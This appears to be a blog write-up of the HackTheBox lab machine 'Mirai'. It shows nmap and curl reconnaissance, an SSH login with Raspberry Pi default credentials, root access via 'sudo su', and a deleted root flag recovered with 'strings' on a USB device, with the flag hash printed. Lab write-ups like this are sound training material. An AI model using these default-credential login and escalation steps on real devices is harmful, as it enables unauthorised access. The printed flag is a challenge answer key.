Mirai is an easy-rated Linux machine from HackTheBox created by Arrexel. It was weird to find nothing at the start. In this machine, it was essential to research elements, mainly because of its IoT orientation. In the current post, my IP is 10.10.14.20, and the target’s IP is 10.129.210.160.
Gathering Information
First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.
Local Terminal
ping -c 1 10.129.210.160
Pinging 10.129.210.160 with 32 bytes of data:
Reply from 10.129.210.160: bytes=32 time=145ms TTL=63
Reply from 10.129.210.160: bytes=32 time=146ms TTL=63
Reply from 10.129.210.160: bytes=32 time=147ms TTL=63
Reply from 10.129.210.160: bytes=32 time=151ms TTL=63
Ping statistics for 10.129.210.160:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 145ms, Maximum = 151ms, Average = 147ms
The TTL is 63, is close to 64 so it is a Linux Machine.
Local Terminal
nmap -p- --open -T5 -v -n 10.129.210.16 -oG AllPorts
Completed SYN Stealth Scan at 20:44, 49.81s elapsed (65535 total ports)
Nmap scan report for 10.129.210.160
Host is up (0.16s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1501/tcp open sas-3
32400/tcp open plex
32469/tcp open unknown
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 50.30 seconds
Raw packets sent: 68926 (3.033MB) | Rcvd: 68952 (2.758MB)
Local Terminal
nmap -sCV -p 22,53,80,1501,32400,32469 10.129.210.160 -oN WebScan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-07 20:53 Pacific SA Standard Time
Nmap scan report for 10.129.210.160
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1501/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-title: Unauthorized
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Here we have something inusual at the port 53, "dnsmasq 2.76", after some research about it, is just a Free Software Providing Domain Name System (DNS), with a big list of exploits, we will save it for later.
curl -s -X GET http://10.129.210.160 -I
HTTP/1.1 404 Not Found
X-Pi-hole: A black hole for Internet advertisements.
Content-type: text/html; charset=UTF-8
Content-Length: 0
Date: Mon, 08 May 2023 01:31:47 GMT
Server: lighttpd/1.4.35
By using curl we get a new relevant information, "Pi-hole", after some research, I found that is an application to block adds and trackers, and is designed to work in embed devices with network availability, like a Raspberry Pi.
The information about being a Raspberry Pi was pretty hidden, so it is worth to try the default credentials at the SSH port {user: pi} {password: raspberry}.
Local Terminal
ssh pi@10.129.210.160
Exploit?
Target Terminal [Pi]
id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)
Look what we found, group 27(sudo), we can use sudo to login again and try the default password... again!
Target Terminal [Pi]
sudo su
Target Root
root@raspberrypi:/home/pi# cd /home/pi
root@raspberrypi:/home/pi# ls -l
total 1440
-rw-r--r-- 1 pi pi 1441764 Aug 13 2017 background.jpg
drwxr-xr-x 3 pi pi 4096 Aug 13 2017 Desktop
drwxr-xr-x 5 pi pi 99 Dec 13 2016 Documents
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Downloads
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Music
drwxr-xr-x 3 pi pi 4096 Aug 13 2017 oldconffiles
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Pictures
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Public
drwxr-xr-x 2 pi pi 1629 Dec 13 2016 python_games
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Templates
drwxr-xr-x 2 pi pi 4096 Aug 13 2017 Videos
I tried with cat first, bad idea, I find a lot of illegible information, and then with cd /dev/, there are a lot of files. At this point the best option is to execute it, if it fails or we can't do anything, we can analize the file with strings
root@raspberrypi:/dev# strings /dev/sdb
.DXd.DXd
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Aaaaand... the flag is in clear text, that was random; the machine is done.
